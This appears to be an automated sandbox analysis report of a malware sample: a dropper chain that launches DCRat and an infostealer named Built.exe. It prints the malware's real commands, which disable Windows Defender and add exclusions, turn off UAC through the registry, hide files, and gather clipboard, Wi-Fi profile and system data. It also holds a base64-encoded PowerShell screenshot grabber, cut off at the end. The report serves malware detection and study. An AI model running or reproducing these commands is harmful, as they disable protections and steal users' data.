4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5760 | System.exe
5760 | System.exe
5760 | System.exe
5760 | System.exe
5760 | System.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5760 | System.exe
5760 | System.exe
5760 | System.exe
5760 | System.exe
5760 | System.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5760 | System.exe
5760 | System.exe
5760 | System.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
pid | process
5760 | System.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (1 IoCs)
Processes:
pid | process
2776 | msedgewebview2.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 4976 | SolaraBootstrapper.exe
Token: SeDebugPrivilege | 1264 | tasklist.exe
Token: SeDebugPrivilege | 3232 | tasklist.exe
Token: SeDebugPrivilege | 5160 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 5696 | WMIC.exe
Token: SeSecurityPrivilege | 5696 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 5696 | WMIC.exe
Token: SeLoadDriverPrivilege | 5696 | WMIC.exe
Token: SeSystemProfilePrivilege | 5696 | WMIC.exe
Token: SeSystemtimePrivilege | 5696 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 5696 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 5696 | WMIC.exe
Token: SeCreatePagefilePrivilege | 5696 | WMIC.exe
Token: SeBackupPrivilege | 5696 | WMIC.exe
Token: SeRestorePrivilege | 5696 | WMIC.exe
Token: SeShutdownPrivilege | 5696 | WMIC.exe
Token: SeDebugPrivilege | 5696 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 5696 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 5696 | WMIC.exe
Token: SeUndockPrivilege | 5696 | WMIC.exe
Token: SeManageVolumePrivilege | 5696 | WMIC.exe
Token: 33 | 5696 | WMIC.exe
Token: 34 | 5696 | WMIC.exe
Token: 35 | 5696 | WMIC.exe
Token: 36 | 5696 | WMIC.exe
Token: SeDebugPrivilege | 5924 | powershell.exe
Token: SeDebugPrivilege | 5548 | powershell.exe
Token: SeDebugPrivilege | 6040 | powershell.exe
Token: SeDebugPrivilege | 5780 | tasklist.exe
Token: SeIncreaseQuotaPrivilege | 5696 | WMIC.exe
Token: SeSecurityPrivilege | 5696 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 5696 | WMIC.exe
Token: SeLoadDriverPrivilege | 5696 | WMIC.exe
Token: SeSystemProfilePrivilege | 5696 | WMIC.exe
Token: SeSystemtimePrivilege | 5696 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 5696 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 5696 | WMIC.exe
Token: SeCreatePagefilePrivilege | 5696 | WMIC.exe
Token: SeBackupPrivilege | 5696 | WMIC.exe
Token: SeRestorePrivilege | 5696 | WMIC.exe
Token: SeShutdownPrivilege | 5696 | WMIC.exe
Token: SeDebugPrivilege | 5696 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 5696 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 5696 | WMIC.exe
Token: SeUndockPrivilege | 5696 | WMIC.exe
Token: SeManageVolumePrivilege | 5696 | WMIC.exe
Token: 33 | 5696 | WMIC.exe
Token: 34 | 5696 | WMIC.exe
Token: 35 | 5696 | WMIC.exe
Token: 36 | 5696 | WMIC.exe
Token: SeDebugPrivilege | 2928 | powershell.exe
Token: SeDebugPrivilege | 4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Token: SeDebugPrivilege | 5756 | tasklist.exe
Token: SeDebugPrivilege | 5316 | powershell.exe
Token: SeDebugPrivilege | 5348 | powershell.exe
Token: SeDebugPrivilege | 5868 | fontsessionruntime.exe
Token: SeIncreaseQuotaPrivilege | 3704 | WMIC.exe
Token: SeSecurityPrivilege | 3704 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 3704 | WMIC.exe
Token: SeLoadDriverPrivilege | 3704 | WMIC.exe
Token: SeSystemProfilePrivilege | 3704 | WMIC.exe
Token: SeSystemtimePrivilege | 3704 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 3704 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 3704 | WMIC.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
description | pid | process | target process
PID 2596 wrote to memory of 4256 | 2596 | 48a8ee49651a74a74baca1f7c94729e5.exe | x12.exe
PID 2596 wrote to memory of 4256 | 2596 | 48a8ee49651a74a74baca1f7c94729e5.exe | x12.exe
PID 2596 wrote to memory of 4256 | 2596 | 48a8ee49651a74a74baca1f7c94729e5.exe | x12.exe
PID 4256 wrote to memory of 3760 | 4256 | x12.exe | x11.exe
PID 4256 wrote to memory of 3760 | 4256 | x12.exe | x11.exe
PID 4256 wrote to memory of 3760 | 4256 | x12.exe | x11.exe
PID 3760 wrote to memory of 3272 | 3760 | x11.exe | x10.exe
PID 3760 wrote to memory of 3272 | 3760 | x11.exe | x10.exe
PID 3760 wrote to memory of 3272 | 3760 | x11.exe | x10.exe
PID 3272 wrote to memory of 1068 | 3272 | x10.exe | cmd.exe
PID 3272 wrote to memory of 1068 | 3272 | x10.exe | cmd.exe
PID 3272 wrote to memory of 1068 | 3272 | x10.exe | cmd.exe
PID 1068 wrote to memory of 936 | 1068 | x9.exe | x8.exe
PID 1068 wrote to memory of 936 | 1068 | x9.exe | x8.exe
PID 1068 wrote to memory of 936 | 1068 | x9.exe | x8.exe
PID 936 wrote to memory of 1920 | 936 | x8.exe | x7.exe
PID 936 wrote to memory of 1920 | 936 | x8.exe | x7.exe
PID 936 wrote to memory of 1920 | 936 | x8.exe | x7.exe
PID 1920 wrote to memory of 2212 | 1920 | x7.exe | x6.exe
PID 1920 wrote to memory of 2212 | 1920 | x7.exe | x6.exe
PID 1920 wrote to memory of 2212 | 1920 | x7.exe | x6.exe
PID 2212 wrote to memory of 1084 | 2212 | x6.exe | x5.exe
PID 2212 wrote to memory of 1084 | 2212 | x6.exe | x5.exe
PID 2212 wrote to memory of 1084 | 2212 | x6.exe | x5.exe
PID 1084 wrote to memory of 3164 | 1084 | x5.exe | x4.exe
PID 1084 wrote to memory of 3164 | 1084 | x5.exe | x4.exe
PID 1084 wrote to memory of 3164 | 1084 | x5.exe | x4.exe
PID 3164 wrote to memory of 4300 | 3164 | x4.exe | Conhost.exe
PID 3164 wrote to memory of 4300 | 3164 | x4.exe | Conhost.exe
PID 3164 wrote to memory of 4300 | 3164 | x4.exe | Conhost.exe
PID 4300 wrote to memory of 1264 | 4300 | CheatLauncherV2.exe | tasklist.exe
PID 4300 wrote to memory of 1264 | 4300 | CheatLauncherV2.exe | tasklist.exe
PID 4300 wrote to memory of 1264 | 4300 | CheatLauncherV2.exe | tasklist.exe
PID 1264 wrote to memory of 1916 | 1264 | DCRatBuild.exe | WScript.exe
PID 1264 wrote to memory of 1916 | 1264 | DCRatBuild.exe | WScript.exe
PID 1264 wrote to memory of 1916 | 1264 | DCRatBuild.exe | WScript.exe
PID 4300 wrote to memory of 2092 | 4300 | CheatLauncherV2.exe | Built.exe
PID 4300 wrote to memory of 2092 | 4300 | CheatLauncherV2.exe | Built.exe
PID 4300 wrote to memory of 4976 | 4300 | CheatLauncherV2.exe | cmd.exe
PID 4300 wrote to memory of 4976 | 4300 | CheatLauncherV2.exe | cmd.exe
PID 4300 wrote to memory of 4976 | 4300 | CheatLauncherV2.exe | cmd.exe
PID 2092 wrote to memory of 2656 | 2092 | Built.exe | Built.exe
PID 2092 wrote to memory of 2656 | 2092 | Built.exe | Built.exe
PID 2656 wrote to memory of 1244 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 1244 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 4604 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 4604 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 2940 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 2940 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 1068 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 1068 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 5900 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 5900 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 5984 | 2656 | Built.exe | WMIC.exe
PID 2656 wrote to memory of 5984 | 2656 | Built.exe | WMIC.exe
PID 5984 wrote to memory of 1264 | 5984 | cmd.exe | tasklist.exe
PID 5984 wrote to memory of 1264 | 5984 | cmd.exe | tasklist.exe
PID 5900 wrote to memory of 3232 | 5900 | cmd.exe | tasklist.exe
PID 5900 wrote to memory of 3232 | 5900 | cmd.exe | tasklist.exe
PID 2656 wrote to memory of 3956 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 3956 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 2384 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 2384 | 2656 | Built.exe | cmd.exe
PID 2656 wrote to memory of 1940 | 2656 | Built.exe | cmd.exe

System policy modification 1 TTPs 6 IoCs
Processes: fontsessionruntime.exe, System.exe
description (ioc, process):
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontsessionruntime.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" fontsessionruntime.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" fontsessionruntime.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" System.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" System.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" System.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes: attrib.exe, attrib.exe, attrib.exe
pid, process:
- 4716 attrib.exe
- 5928 attrib.exe
- 5968 attrib.exe
Processes
Tree depth is shown in brackets; each entry lists the image path, the command line (cmd), the behaviour flags and the PID.
[1] C:\Users\Admin\AppData\Local\Temp\48a8ee49651a74a74baca1f7c94729e5.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\48a8ee49651a74a74baca1f7c94729e5.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2596
  [2] C:\Users\Admin\AppData\Local\Temp\x12.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\x12.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:4256
    [3] C:\Users\Admin\AppData\Local\Temp\x11.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\x11.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        PID:3760
      [4] C:\Users\Admin\AppData\Local\Temp\x10.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\x10.exe"
          - Checks computer location settings
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
          PID:3272
        [5] C:\Users\Admin\AppData\Local\Temp\x9.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\x9.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
            PID:1068
          [6] C:\Users\Admin\AppData\Local\Temp\x8.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\x8.exe"
              - Checks computer location settings
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
              PID:936
            [7] C:\Users\Admin\AppData\Local\Temp\x7.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\x7.exe"
                - Checks computer location settings
                - Executes dropped EXE
                - Suspicious use of WriteProcessMemory
                PID:1920
              [8] C:\Users\Admin\AppData\Local\Temp\x6.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\x6.exe"
                  - Checks computer location settings
                  - Executes dropped EXE
                  - Suspicious use of WriteProcessMemory
                  PID:2212
                [9] C:\Users\Admin\AppData\Local\Temp\x5.exe
                    cmd: "C:\Users\Admin\AppData\Local\Temp\x5.exe"
                    - Checks computer location settings
                    - Executes dropped EXE
                    - Suspicious use of WriteProcessMemory
                    PID:1084
                  [10] C:\Users\Admin\AppData\Local\Temp\x4.exe
                      cmd: "C:\Users\Admin\AppData\Local\Temp\x4.exe"
                      - Checks computer location settings
                      - Executes dropped EXE
                      - Suspicious use of WriteProcessMemory
                      PID:3164
                    [11] C:\Users\Admin\AppData\Local\Temp\CheatLauncherV2.exe
                        cmd: "C:\Users\Admin\AppData\Local\Temp\CheatLauncherV2.exe"
                        - Checks computer location settings
                        - Executes dropped EXE
                        - Suspicious use of WriteProcessMemory
                        PID:4300
                      [12] C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
                          cmd: "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
                          - Checks computer location settings
                          - Executes dropped EXE
                          - Modifies registry class
                          - Suspicious use of WriteProcessMemory
                          PID:1264
                        [13] C:\Windows\SysWOW64\WScript.exe
                            cmd: "C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe"
                            - Checks computer location settings
                            PID:1916
                          [14] C:\Windows\SysWOW64\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "
                              PID:4616
                            [15] C:\agentInto\fontsessionruntime.exe
                                cmd: "C:\agentInto\fontsessionruntime.exe"
                                - Modifies WinLogon for persistence
                                - UAC bypass
                                - Checks computer location settings
                                - Executes dropped EXE
                                - Adds Run key to start application
                                - Checks whether UAC is enabled
                                - Drops file in Program Files directory
                                - Modifies registry class
                                - Suspicious behavior: EnumeratesProcesses
                                - Suspicious use of AdjustPrivilegeToken
                                - System policy modification
                                PID:5868
                              [16] C:\Windows\System32\cmd.exe
                                  cmd: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hWqljiZbNB.bat"
                                  PID:5516
                                [17] C:\Windows\system32\w32tm.exe
                                    cmd: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    PID:5408
                                [17] C:\Program Files\Microsoft Office 15\ClientX64\System.exe
                                    cmd: "C:\Program Files\Microsoft Office 15\ClientX64\System.exe"
                                    - UAC bypass
                                    - Executes dropped EXE
                                    - Checks whether UAC is enabled
                                    - Suspicious behavior: EnumeratesProcesses
                                    - Suspicious behavior: GetForegroundWindowSpam
                                    - System policy modification
                                    PID:5760
                      [12] C:\Users\Admin\AppData\Local\Temp\Built.exe
                          cmd: "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                          - Executes dropped EXE
                          - Suspicious use of WriteProcessMemory
                          PID:2092
                        [13] C:\Users\Admin\AppData\Local\Temp\Built.exe
                            cmd: "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                            - Drops file in Drivers directory
                            - Executes dropped EXE
                            - Loads dropped DLL
                            - Suspicious use of WriteProcessMemory
                            PID:2656
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
                              PID:1244
                            [15] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
                                - Command and Scripting Interpreter: PowerShell
                                - Suspicious behavior: EnumeratesProcesses
                                - Suspicious use of AdjustPrivilegeToken
                                PID:5160
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                              PID:4604
                            [15] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                cmd: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                - Suspicious behavior: EnumeratesProcesses
                                - Suspicious use of AdjustPrivilegeToken
                                PID:5924
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                              - Hide Artifacts: Hidden Files and Directories
                              PID:2940
                            [15] C:\Windows\system32\attrib.exe
                                cmd: attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                                - Views/modifies file attributes
                                PID:4716
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                              PID:1068
                            [15] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                - Command and Scripting Interpreter: PowerShell
                                - Suspicious behavior: EnumeratesProcesses
                                - Suspicious use of AdjustPrivilegeToken
                                PID:5548
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                              - Suspicious use of WriteProcessMemory
                              PID:5900
                            [15] C:\Windows\system32\tasklist.exe
                                cmd: tasklist /FO LIST
                                - Enumerates processes with tasklist
                                - Suspicious use of AdjustPrivilegeToken
                                PID:3232
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                              - Suspicious use of WriteProcessMemory
                              PID:5984
                            [15] C:\Windows\system32\tasklist.exe
                                cmd: tasklist /FO LIST
                                - Enumerates processes with tasklist
                                - Suspicious use of AdjustPrivilegeToken
                                PID:1264
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                              PID:3956
                            [15] C:\Windows\System32\Wbem\WMIC.exe
                                cmd: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                - Suspicious use of AdjustPrivilegeToken
                                PID:5696
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                              PID:2384
                            [15] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                cmd: powershell Get-Clipboard
                                - Suspicious behavior: EnumeratesProcesses
                                - Suspicious use of AdjustPrivilegeToken
                                PID:2928
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                              PID:1940
                            [15] C:\Windows\system32\tasklist.exe
                                cmd: tasklist /FO LIST
                                - Enumerates processes with tasklist
                                - Suspicious use of AdjustPrivilegeToken
                                PID:5780
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "tree /A /F"
                              PID:4360
                            [15] C:\Windows\system32\tree.com
                                cmd: tree /A /F
                                PID:6108
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                              PID:4184
                            [15] C:\Windows\system32\netsh.exe
                                cmd: netsh wlan show profile
                                - Event Triggered Execution: Netsh Helper DLL
                                PID:5592
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "systeminfo"
                              PID:5916
                            [15] C:\Windows\system32\systeminfo.exe
                                cmd: systeminfo
                                - Gathers system information
                                PID:2496
                          [14] C:\Windows\system32\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                              PID:5892
                            [15] C:\Windows\system32\reg.exe
                                cmd: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                PID:3000
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIAB
iAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="14⤵PID:5972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAA